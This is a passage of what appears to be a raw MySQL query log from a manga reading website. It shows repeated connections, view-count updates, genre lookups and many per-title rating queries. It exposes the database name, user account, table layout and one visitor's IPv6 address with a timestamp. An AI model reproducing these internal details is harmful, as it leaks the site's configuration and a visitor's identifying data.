where manga_id = '172' order by id desc 330652556 Quit 330652557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652557 Query Update chapters set view=view+1 where id = '12813' 330652557 Quit 330652558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652558 Query select * FROM chapters where id = '12813' 330652558 Quit 330652559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652559 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12813' 330652559 Quit 330652560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652560 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('172', '12813', '2001:448a:1150:cad9:321b:5a9a:3854:4f83', 'mangacherri.com', '2026-02-26 03:29:25', '2026-02-26 03:29:25') 330652560 Quit 330652561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652561 Query select * FROM chapter_images where chapter_id = '12813' 330652561 Quit 330652562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652562 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '172' and m.active = 1 330652562 Quit 330652563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652563 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='172' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 260225 19:29:26 330652564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652552 Quit 330652565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652565 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.genres like '%Romance%' group by manga_id ORDER BY sum(view) DESC 330652566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652564 Quit 330652566 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652566 Quit 330652565 Quit 330652567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652567 Quit 330652568 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652568 Quit 330652569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330652569 Quit 330652570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330652570 Quit 330652571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330652571 Quit 330652572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330652572 Quit 330652573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330652573 Quit 330652574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330652574 Quit 330652575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330652575 Quit 330652576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330652576 Quit 330652577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330652577 Quit 330652578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330652578 Quit 330652579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330652579 Quit 330652580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330652580 Quit 330652581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330652581 Quit 330652582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330652582 Quit 330652583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330652583 Quit 330652584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330652584 Quit 330652585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330652585 Quit 330652586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330652586 Quit 330652587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330652587 Quit 330652588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330652588 Quit 330652589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330652589 Quit 330652590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330652590 Quit 330652591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330652591 Quit 330652592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330652592 Quit 330652593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330652593 Quit 330652594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330652594 Quit 330652595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330652595 Quit 330652596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330652596 Quit 330652597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330652597 Quit 330652598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330652598 Quit 330652599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330652599 Quit 330652600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330652600 Quit 330652601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330652601 Quit 330652602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330652602 Quit 330652603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330652603 Quit 330652604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330652604 Quit 330652605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330652605 Quit 330652606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330652606 Quit 330652607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330652607 Quit 330652608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330652608 Quit 330652609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330652609 Quit 330652610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330652610 Quit 330652611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330652611 Quit 330652612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330652612 Quit 330652613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330652613 Quit 330652614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330652614 Quit 330652615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330652615 Quit 330652616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330652616 Quit 330652617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330652617 Quit 330652618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330652618 Quit 330652619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330652619 Quit 330652620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330652620 Quit 330652621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330652621 Quit 330652622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330652622 Quit 330652623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330652623 Quit 330652624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330652624 Quit 330652625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330652625 Quit 330652626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330652626 Quit 330652627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330652627 Quit 330652628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330652628 Quit 330652629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330652629 Quit 330652630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330652630 Quit 330652631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330652631 Quit 330652632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330652632 Quit 330652633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330652633 Quit 330652634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330652634 Quit 330652635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330652635 Quit 330652636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330652636 Quit 330652637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330652637 Quit 330652638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330652638 Quit 330652639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330652639 Quit 330652640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330652640 Quit 330652641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330652641 Quit 330652642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330652642 Quit 330652643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330652643 Quit 330652644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330652644 Quit 330652645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330652645 Quit 330652646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330652646 Quit 330652647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330652647 Quit 330652648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330652648 Quit 330652649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330652649 Quit 330652650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330652650 Quit 330652651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330652651 Quit 330652652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330652652 Quit 330652653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330652653 Quit 330652654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330652654 Quit 330652655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330652655 Quit 330652656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330652656 Quit 330652657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330652657 Quit 330652658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330652658 Quit 330652659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330652659 Quit 330652660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330652660 Quit 330652661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330652661 Quit 330652662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330652662 Quit 330652663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330652663 Quit 330652664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330652664 Quit 330652665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330652665 Quit 330652666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330652666 Quit 330652667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330652667 Quit 330652668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330652668 Quit 330652669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330652669 Quit 330652670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330652670 Quit 330652671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330652671 Quit 330652672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330652672 Quit 330652673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330652673 Quit 330652674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330652674 Quit 330652675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330652675 Quit 330652676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330652676 Quit 330652677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330652677 Quit 330652678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330652678 Quit 330652679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330652679 Quit 330652680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330652680 Quit 330652681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330652681 Quit 330652682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330652682 Quit 330652683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330652683 Quit 330652684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330652684 Quit 330652685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330652685 Quit 330652686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330652686 Quit 330652687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330652687 Quit 330652688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330652688 Quit 330652689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330652689 Quit 330652690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330652690 Quit 330652691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330652691 Quit 330652692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330652692 Quit 330652693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330652693 Quit 330652694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330652694 Quit 330652695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330652695 Quit 330652696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330652696 Quit 330652697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330652697 Quit 330652698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330652698 Quit 330652699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330652699 Quit 330652700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330652700 Quit 330652701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330652701 Quit 330652702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330652702 Quit 330652703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330652703 Quit 330652704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330652704 Quit 330652705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330652705 Quit 330652706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330652706 Quit 330652707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330652707 Quit 330652708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating 